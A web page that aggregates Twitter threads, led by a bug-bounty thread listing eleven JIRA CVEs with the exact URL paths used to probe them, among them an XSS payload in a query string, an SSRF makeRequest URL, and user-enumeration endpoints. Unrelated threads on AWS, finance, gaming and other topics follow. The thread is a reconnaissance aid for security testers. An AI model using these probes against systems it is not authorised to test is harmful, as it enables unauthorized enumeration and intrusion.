BC SOFTWARE

Saved by @CodyyyGardner

Harsh Bothra
@harshbothra_ 5 years, 5 months ago 1891 views

Save to PDF Share See On Twitter

#Learn365 Day-4: Unauthenticated & Exploitable JIRA Vulnerabilities

There are multiple security vulnerabilities associated with the various versions of JIRA software which are exploited in wild and is one of my personal favourite 3rd Party apps to hunt.

#BugBountyTips

(1/n)

(2/n)
1. CVE-2020-14179 (Information Disclosure)
a. Navigate to /secure/QueryComponent!Default.jspa
b. It leaks information about custom fields, custom SLA, etc.

2. CVE-2020-14181 (User Enumeration)
a. Navigate to /secure/ViewUserHover.jspa?username=

(3/n)
3. CVE-2020-14178 (Project Key Enumeration)
a. Navigate to /browse.
b. Observe the error message on valid vs. invalid project key. Apart from the Enumeration, you can often get unauthenticated access to the project if the protections are not in place.

(4/n)
4. CVE-2019-3402 (XSS)
a. Navigate to /secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search

5. CVE-2019-11581 (SSTI)
a. Navigate to /secure/ContactAdministrators!default.jspa

(5/n)
6. CVE-2019-3396 (Path Traversal)
7. CVE-2019-8451 (SSRF)
a. Navigate to /plugins/servlet/gadgets/makeRequest?url=https://:[email protected]
8. CVE-2019-8451 (SSRF)
a. Navigate to /plugins/servlet/gadgets/makeRequest?url=https://:[email protected]

(6/n)
9. CVE-2019-8449 (User Information Disclosure)
a. Navigate to /rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
b. Observe that the user related information will be available.

(7/n)
10. CVE-2019-3403 (User Enumeration)
a. Navigate to /rest/api/2/user/picker?query=
b. Observe the difference in response when valid vs. invalid user is queried.

(8/n)

11. CVE-2019-8442 (Sensitive Information Disclosure)

a. Navigate to /s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
b. Observe that the pom.xml file is accessible.

(n/n)
Tools: Nuclei Template can be used to automate most of these CVEs Detection.
H1 Reports:
- https://t.co/AaXKHt4NZZ
- https://t.co/hNrzpDgB5A
Blogs:
- https://t.co/ZMVc80vrYQ

More from Software

Yan Cui is making the ...
@theburningmonk

If you missed @clare_liguori's Continuous Delivery session this week (like I did) then good news, it's available on-demand now 🎊

https://t.co/78b8sI2hHs

And here's my play-by-play for the session

🧵...

This is a typical CD pipeline in AWS.

This is far more complex than the most complex CD pipeline I have ever had! Just cos it's complex, doesn't mean it's over-engineered though. Given the blast radius, I'm glad they do releases carefully and safely.

If you look closely, beyond all the alpha, beta, gamma environments, it's one-box in a region first then the rest of the region, I assume starting with the least risky regions first.

For anyone thinking about going multi-region (after the recent Kinesis outage), this is one of the complexities you need to consider. To do multi-region right and deploy safely (minimize blast radius), this is one of the complexities you have to factor in.

This "deploy small at first then more broadly" principle applies to #serverless apps too, though you can't "deploy to one box". You can do it with canary deployments instead, CodeDeploy supports this practice for Lambda (using weighted aliases) out-of-the-box.

foone
@Foone

now that's a title screen

foolish people like to quote that "science says there are only two genders". This is incorrect.

Science instead says that in addition to the regular genders, there are 25 Science Genders, shown here. (tag yourself I'm Skull)

I have no idea how to continue with this game.
I clicked a bunch of things and the game just pauses for a second, except when I clicked electron it animated and then was replaced by... something

Quarky & Quaysoo's Turbo Science!

Turbo Science is like regular Science, but FASTER

oh I see

is this Gizmos and Gadgets but by Sierra?

Advertisement

Patrick McKenzie
@patio11

One of the big promises of software is composability. You can build rich, powerful experiences out of basic building blocks.

APIs add new things to the toolbox. For example: Treasury, which lets an app/platform store, move, and track a business’

I've been a small business owner and can talk at length about SMB banking, and will later, but let's put on the software developer hat right now.

Lots of software talks about money, keeps records about money, does calculations about money, but can't *touch* money.

This is extremely frustrating when you're building SaaS apps for businesses, because you have total control over your UX right until your app needs to touch money... at which point all data about it lives in a silo you can't access.

So you generally push work to the operator.

For example, suppose you’re writing a business-in-a-box system for electricians, including an invoicing feature.

You need to be able to read bank transactions to reconcile. You probably can't. The owner can. So you ask the owner to do mind-numbing work a computer does better.

It sure would be great if your business customers had bank accounts you could actually introspect and operate on their behalves! You could just get the list of incoming payments and match against the invoices.

There is some software to write but it is not rocket science.

Scott Piper
@0xdabbad00

As the year wrap's up, let's run through some of the worst public security mistakes and delays in fixes by AWS in 2020. A thread.

First, that time when an AWS employee posted confidential AWS customer information including including AWS access keys for those customer accounts to

Fresh data breach news-
Amazon AWS engineer exposes work-related keys, passwords, and documents marked "Amazon Confidential" via public Github repository: https://t.co/7gkIegnslx
Discovered within 30 minutes of exposure by my team at @UpGuard.
— Chris Vickery (@VickerySec) January 23, 2020

Discovery by @SpenGietz that you can disable CloudTrail without triggering GuardDuty by using cloudtrail:PutEventSelectors to filter all events.

"Disable" most #AWS #CloudTrail logging without triggering #GuardDuty:https://t.co/zVe4uSHog9

Reported to AWS Security and it is not a bug.
— Rhino Security Labs (@RhinoSecurity) April 23, 2020

Amazon launched their bug bounty, but specifically excluded AWS, which has no bug bounty.

Amazon Vulnerability Research Program - Doesn't include AWS D:https://t.co/stJHDG68pj #BugBounty #AWS
— Spencer Gietzen (@SpenGietz) April 22, 2020

Repeated, over and over again examples of AWS having no change control over their Managed IAM policies, including the mistaken release of CheesepuffsServiceRolePolicy, AWSServiceRoleForThorInternalDevPolicy, AWSCodeArtifactReadOnlyAccess.json, AmazonCirrusGammaRoleForInstaller.

$Jared Naude @ rC3 \U0001f680$

Jared Naude @ rC3 🚀...
@JaredNaude

Infrastructure review #rc3

There were only 18 heralds for all the talks. It was really hard to pull off, this conference also started a news show. #rc3

Next is the heaven team. 1487 total angels volunteered of which 710 arrived. 76 weeks worth of work hours were done by the angels. They prepared a few goodies for the RC3 world. Badges were given to show angels. Tried to keep traditions from the conference on RC3 world. #rc3

Huge thanks to all the angels who volunteered. This conference would not be possible with the help of everyone. #rc3

Next team is the signal angels, this is the first time that people had to do remote Q&A. The procedure was quite different to the in person event. There were 157 shifts filled by 61 angels. There were 5 unfilled shifts. #rc3

You May Also Like

$Anu Satheesh \U0001f1ee\U0001f1f3$

Anu Satheesh 🇮🇳...
@AnuSatheesh5

Neyyattinkara Krishna Kshetram
#Thiruvananthapuram
#KeralaTemples 🚩

Neyyattinkara Krishna Kshetram is considered as the Guruvayur of Trivandrum. Thrikkayyil Venna (butter) is main offering to Neyyattinkara Unnikannan. Kshetram is supposed to be built by Marthanda Varma.

Sthala Puranam says that, Anizham Thirunal Marthanda Varma was surrounded by his enemies, Ettuveettil Pillamar, while he was near the place where Temple is situated now. The king prayed to Padmanabhaswamy to protect him. At that time, a small boy was seen there and he

advised the king to hide himself inside the hollow trunk of a jack fruit tree. The king was surprised to find a small boy in the forest, but agreed to the advice
Thus he was saved from the attack. When the enemies left, king tried to know about the boy, but he couldn't.

He believed that it was krishna himself who saved his life. A temple was built here, which is the present Neyyattinkara Krishna Kshetram. The jack fruit tree where the king hid himself is now known as Ammachi Plavu. Ashtami Rohini, Vishu are very famous here

Hare Krishna
🙏🕉🙏

$Brianne Kimmel \U0001f4ac$

Brianne Kimmel 💬...
@briannekimmel

Shocking fact: Millennial men are less likely to work than any other age and gender demographic in America.

Today, there are 500,000 young men missing from the U.S. workforce.

Research suggests video games & improved leisure tech plays a role in the problem. 👇 Thread:

Following the 2007 to 2009 recession, 25 to 34 year old men exited high school with fewer middle-skill job opportunities than years prior.

During this time, we saw an increased number of men living with parents & choosing unemployment over lower paying jobs.

It's estimated that 24M millennials live w/ their parents.

1 in 4 living in their parents’ home neither go to school nor work.

What's more surprising? 9 in 10 who lived with their parents a year ago are still living there w/ no plans to leave.

Economists are calling millennial men a lost generation.

According to economist David Dorn:

“If you get to the point where you’re turning 30, you’ve never held a real job and you don’t have a college education, then it is very hard to recover at that point.”

Economists suggest this choosiness is a generational trait.

Forbes interview w/ a high school educated man:

"I’m very quick to get frustrated when people refuse to pay me what I’m worth."
“People feel that they have choice nowadays, and they

Advertisement

Novid Houellebecq (Tha...
@GarouGothic

Ok, here is a thread for you.
What happens when you have:
Netflix
Apple
Amazon
WarnerMedia +
Disney+
SonyCrackle (Reboot)
Verizon All Access (after they buy CBS/Viacom)
UniversalSkyMedia
By 2021
Answer? Internet Slows To A Craw and Dies.
Why?
Bandwidth.

Netflix's gets 35% of all internet traffic.
Now we all know Apple Coming to Netflix Corner.
We know that WarnerMedia Planning One
We Know about Disney+
Now how will the net handle 8 Streaming Platforms all at once?
Answer - IT CANT.

But Novid, the speed, the 4K the all everything?
NOOOOO BUDDY.
Even if you could do it and even if AWS ran six million clouds, The Net Will still slow to a crawl. 35%, goes to nearly 90% if any of the 8 or all of the 8 eat at netflix's numbers.

Oh, they wouldn't be running at once.
FOOL. You forget how bad things were when game of thrones season premieres came around. HBO SERVERS FALL DOWN GO BOOM!

Now see if a season like 2021 come around and they air shows on a same day. It gets crazy. AT&T and others gonna realize they cant build out forever. Something will give and it might be your entertainment consumption big time.

christmas cheer liz br...
@ebruenig

one of the things i like about Batman is that it's fundamentally about being orphaned, and being an orphan — how this guy stays tethered to the world in his own weird, abstract, extrajudicial way when he feels that his link to it has been violently severed

Batman does this by permanently recapitulating his own trauma: solving crimes for other people, protecting them. But that's actually just the beginning; he also recapitulates his own experience of orphanness by essentially raising several orphans

Dick is an orphan in the traditional sense: dead parents. Batman sees it happen. Jason, less so: missing dad, known mom who eventually dies. Tim, even less so: parents are around a while, and involved, before both dying. Carrie, even less than that: negligent parents.

Steph: evil father, who openly works against her. And then there's Damian, whose parents are both alive and yet both have identities that totally obliterate their role as his parents. He doesn't relate to them as a mother and father; he can't, and neither can they.

In all these different cases, Batman tries all these different ways of making orphanness for them not what it was for him: Either by trying to teach them the (arguably poor) coping skills early that he learned over a very long time, or by literally legally adopting them, etc.

Techno Funda Investing
@TechnoFunda6

Thread 🧵explaining #ROE & #ROCE and its use in #FundamentalAnalysis

(Must read for #FA learners)

🙏Like & RT to spread learning with all 🙏

Views Welcome 👉 @dmuthuk @Vivek_Investor @datta_arvind @caniravkaria @FI_InvestIndia @AdityaD_Shah

#FundamentalAnalysis #StockMarket

1⃣

Return on Equity (#ROE) and Return on Capital Employed (#ROCE) are two important Financial Ratios used in #FundamentalAnalysis of Stocks.

#StockMarket #Investing

2⃣

Return on Equity (ROE) is the ratio of Net Income (Net Profit) of a company and it’s Total Equity (Shareholder's Equity).

Here - Shareholders Equity = Share Capital + Reserves & Surplus.

#StockMarket #Investing #FundamentalAnalysis

3⃣

#ROE is a measure of how much net profit a company is making for every rupee invested by its shareholders in the company.

It can be said that higher the ROE, better it is for the equity shareholders. It tells shareholders about how effectively their money is being used.

4⃣

However, you should not trust high ROE blindly. Biggest drawbacks or weaknesses of ROE is that it completely ignores debt.

Hence for companies having high levels of debt, ROE will give a higher but misleading value & therefore we need to look at #ROCE along with #ROE.